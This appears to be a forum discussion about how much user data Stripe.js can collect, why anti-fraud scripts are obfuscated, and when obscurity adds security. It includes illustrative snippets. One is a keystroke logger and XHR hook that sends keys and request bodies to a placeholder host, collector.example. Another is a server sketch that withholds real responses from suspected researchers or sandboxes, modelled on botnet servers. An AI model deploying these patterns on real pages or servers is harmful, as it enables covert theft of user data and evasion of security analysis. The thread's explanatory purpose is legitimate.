Is this view conditional on the type of data Stripe is currently collecting, or would it apply to any data Stripe collects? Would it still hold if Stripe began recording every keystroke in the app, hooking every XHR request to my backend server, and sending itself copies?
I agree that Stripe has a sensible reason for using this data. If I started seeing a high rate of chargebacks, I'd consider enabling Stripe.js on more parts of my site so that Stripe could observe user behavior earlier and detect fraud sooner.
My issue is that if there's no agreement about what data Stripe is allowed to collect and what their retention policies are, then the implicit agreement is that Stripe can just collect anything it has access to and hold it forever.
As JavaScript running on my page, Stripe.js has access to basically all user data in my app. There are certain types of user data I would not be comfortable sharing with Stripe, even if it improved fraud detection, so I'd like there to be clear limits on what they're gathering.
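To make that concrete, here's a rough sketch of what any third-party script is technically able to do once it's embedded in a page. The endpoint is invented, and this is about capability, not anything Stripe.js is actually observed doing:

    // Sketch of what ANY third-party script on a page can do.
    // Invented endpoint; capability, not observed Stripe.js behavior.

    // 1) Record every keystroke on the page.
    document.addEventListener('keydown', (e: KeyboardEvent) => {
      navigator.sendBeacon('https://collector.example/keys', e.key);
    });

    // 2) Hook every XHR to the first-party backend and copy the body.
    const origSend = XMLHttpRequest.prototype.send;
    XMLHttpRequest.prototype.send = function (body?: Document | XMLHttpRequestBodyInit | null) {
      if (typeof body === 'string') {
        navigator.sendBeacon('https://collector.example/xhr', body);
      }
      return origSend.call(this, body);
    };

Nothing in the browser's same-origin model stops this: once the script runs on my origin, it sees what my own code sees.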
It's a library everyone can technically analyze, yes. But by 1) using ever-changing obfuscation that takes a lot of work to reverse-engineer, and 2) constantly changing the client-side logic itself, Stripe makes the adversaries' work much harder and more tedious. Either fewer of them will consistently succeed, or more of them will be forced to centralize around the solutions/services that have cracked it, which lets Stripe focus-fire its efforts a bit more.
Of course there's also a lot going on on the backend that will never be seen. But the adversary is trying to mimic a legitimate user as closely as possible, so if the JavaScript is totally unobfuscated and stays the same for a while, it's much easier for them to trace exactly what data is being sent and compare it against what their own system or altered browser sends.
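To illustrate with a toy example (nothing like a production obfuscator, purely my own sketch): even a trivial string-extraction pass, re-rolled every build, forces the adversary to re-trace which call sends what.

    // Before any obfuscation (easy to grep and trace):
    //   fetch('/fingerprint', { method: 'POST', body: payload });
    // After a toy string-table pass. The table's contents, order, and
    // encoding can rotate per release, so last month's notes about
    // "which string is which" go stale:
    const payload = JSON.stringify({ example: true });
    const _t = ['L2ZpbmdlcnByaW50', 'UE9TVA=='].map(s => atob(s)); // ['/fingerprint', 'POST']
    fetch(_t[0], { method: _t[1], body: payload });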
It's cat-and-mouse across many dimensions. In such adversarial games, obscurity actually can, and often does, add some security. "Security by obscurity is no security at all" isn't exactly a fallacy, but it is a fallacy to apply it universally and with a very liberal definition of "security". It's generally meant for things that are more formal or provable, like an encryption or hashing algorithm or other cryptography. It's still totally reasonable to use obscurity as a minor practical measure. I'd agree with this part of https://en.wikipedia.org/wiki/Security_through_obscurity: "Knowledge of how the system is built differs from concealment and camouflage. The efficacy of obscurity in operations security depends on whether the obscurity lives on top of other good security practices, or if it is being used alone. When used as an independent layer, obscurity is considered a valid security tool."
For example, configuring your web server not to display its version in headers or on error pages is "security by obscurity". It certainly won't save you if you're running a vulnerable version, but it may buy you some time when a 0-day comes out for your version and people search Shodan for the vulnerable version numbers: your site won't appear in the list. These kinds of obscurity measures never guarantee security and should only ever be a final layer on top of true security measures, but they can still potentially help you a little.
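Assuming a Node/Express stack just for illustration (nginx's equivalent is server_tokens off), that kind of header hygiene is a one-liner:

    import express from 'express';

    const app = express();
    // Stop advertising the framework in the X-Powered-By header.
    // Pure obscurity: it patches nothing, but it keeps you out of
    // lazy "search for framework/version X" sweeps.
    app.disable('x-powered-by');

    app.get('/', (_req, res) => res.send('ok'));
    app.listen(3000);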
In the "malware vs. anti-virus" and "game cheat vs. game cheat detection software" fights that play out every day, both sides of each heavily obfuscate their code and the actions they perform. No, this never ensures it won't be fully reverse engineered. And the developers all know that. Given enough time and dedication, it'll eventually happen. But it requires more time and effort, and each time it's altered, it requires a re-investment of that time and effort.
Obfuscation and obscurity are arguably the defining feature and "value proposition" of each of those four types of software. A lot of that remains totally hidden on the backend (e.g. a botnet C2 web server only responding with malware binaries after analyzing the connection and concluding it really is a regular infected computer and not a security researcher or sandbox), but a lot is also present in the client.
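That server-side gating idea can be sketched in a few lines. The heuristics here are deliberately trivial stand-ins; real systems weigh TLS fingerprints, timing, IP reputation, request history, and much more:

    import http from 'node:http';

    http.createServer((req, res) => {
      // Toy heuristic: does this look like a normal browser/client?
      const ua = String(req.headers['user-agent'] ?? '');
      const plausible = ua.includes('Mozilla') && 'accept-language' in req.headers;

      if (!plausible) {
        // Researchers and sandboxes see nothing interesting.
        res.writeHead(404);
        res.end();
        return;
      }
      res.writeHead(200, { 'content-type': 'text/plain' });
      res.end('real response');
    }).listen(8080);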
Most of your examples are quite low-level, but it's much harder to keep things hidden within the constraints of the browser sandbox, where you have to interface with standard APIs that can be easily instrumented.
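For instance, anyone can wrap those APIs before the script loads and log every call it makes, however scrambled its internals are. A quick devtools-style sketch:

    // Run before the target script loads (devtools snippet, userscript,
    // or extension content script). Obfuscation can hide internal
    // logic, but not which standard APIs get called, or with what.
    const origToDataURL = HTMLCanvasElement.prototype.toDataURL;
    HTMLCanvasElement.prototype.toDataURL = function (...args) {
      console.log('canvas pixels read (fingerprinting?)');
      return origToDataURL.apply(this, args);
    };

    const origFetch = window.fetch;
    window.fetch = (input, init) => {
      console.log('fetch:', String(input), init?.method ?? 'GET');
      return origFetch.call(window, input, init);
    };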
I haven't analyzed it and can't say this with any certainty, but my guess is that you're probably right: they're focusing primarily on backend analysis and ML that compares activity across a massive array of customers. That's different from smaller security firms, which have far less data: fewer customers, plus a sampling bias toward customers who are particularly worried about, or inundated by, fraud.
They may be less interested in suspicious activity or fingerprinting at the device level and more interested in it at the payment and personal information level (which is suggested by articles like https://stripe.com/radar/guide).
Pure, uninformed speculation, but if they get deeper into anti-fraud in the future (perhaps because fraudsters get smarter about this higher layer of evasion), they might supplement the data-science / finance / payment-oriented work with more low-level device and browser analysis. In that case I wouldn't be surprised if they eventually split some of the anti-fraud/security parts into an obfuscated portion. (Or, more likely, have Stripe.js load that portion dynamically. Maybe they're already doing this? Dunno.)
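If they did go that route, the dynamic loading itself is simple; something like this, entirely hypothetical, with invented URLs and names:

    // Hypothetical: fetch a manifest naming the current, frequently
    // rotated obfuscated bundle, then inject it. Assumes a module
    // context (top-level await); everything here is invented.
    const manifest = await fetch('https://cdn.example/fraud-manifest.json')
      .then(r => r.json());
    const s = document.createElement('script');
    s.src = `https://cdn.example/${manifest.currentBundle}`; // e.g. radar-7f3a.js
    s.async = true;
    document.head.appendChild(s);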